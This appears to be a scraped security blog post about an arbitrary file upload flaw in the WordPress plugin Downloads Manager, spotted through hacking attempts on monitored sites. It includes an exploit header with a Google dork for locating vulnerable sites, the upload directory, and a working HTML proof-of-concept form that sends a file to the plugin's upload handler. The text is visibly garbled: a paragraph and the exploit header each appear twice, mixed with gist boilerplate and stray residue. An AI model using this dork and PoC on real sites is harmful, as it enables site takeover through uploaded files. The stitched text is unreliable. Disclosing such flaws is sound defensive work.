One of the things we do to make sure we are providing our customers with the best data on the vulnerabilities that exist and are being exploited in WordPress plugins is to monitor our websites for hacking attempts. Through that we have found a quite a few vulnerabilities that exist in the current versions of plugins that it looks like hackers have already started exploiting.
There have been periods where we have been spotting those quite often and others where we there are longs periods between discoveries. We have recently been in a slow period, but that has just changed, as yesterday we spotted an arbitrary file upload vulnerability in Genesis Simple Defaults and today we found the same type of vulnerability in the plugin Downloads Manager.
 |
| Wordpress Downloads Manager Arbitrary File Upload Vulnerability |
There have been periods where we have been spotting those quite often and others where we there are longs periods between discoveries. We have recently been in a slow period, but that has just changed, as yesterday we spotted an arbitrary file upload vulnerability in Genesis Simple Defaults and today we found the same type of vulnerability in the plugin Downloads Manager.
This time it started with a request for the file /wp-content/plugins/downloads-manager/single-download-template.tpl on one of the website, which looked to be someone probing for usage of the Downloads Manager plugin. Based on the name our first thought would that there was a vulnerability in its download capability that would allow you to download an arbitrary file from the website, but as we started to take a look at the plugin we found it had a file upload capability on one the plugin’s page in the admin area of WordPress:
#########################################################
# Exploit Title: Wordpress Downloads Manager Arbitrary File Upload Vulnerability
# Category: webapps
# version affected : 1.0
# Google Dork : inurl:wp-content/plugins/downloads-manager/
# Index of /wp-content/plugins/downloads-manager
########################################################
-------------------------------------------------------------------------------
#
#
# File Path
#
# /wp-content/plugins/downloads-manager/upload/
#
#########################################################
# Exploit Title: Wordpress Downloads Manager Arbitrary File Upload Vulnerability
# Category: webapps
# version affected : 1.0
# Google Dork : inurl:wp-content/plugins/downloads-manager/
# Index of /wp-content/plugins/downloads-manager
########################################################
-------------------------------------------------------------------------------
#
#
# File Path
#
# /wp-content/plugins/downloads-manager/upload/
#
Proof of Concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <form action="http://[path to WordPress]" method="POST" enctype="multipart/form-data"> | |
| <input type="hidden" name="dm_upload" /> | |
| <input type="file" name="upfile" /> | |
| <input type="submit" value="Submit" /> | |
| </form> | |
| </body> | |
| </html> | |
EmoticonEmoticon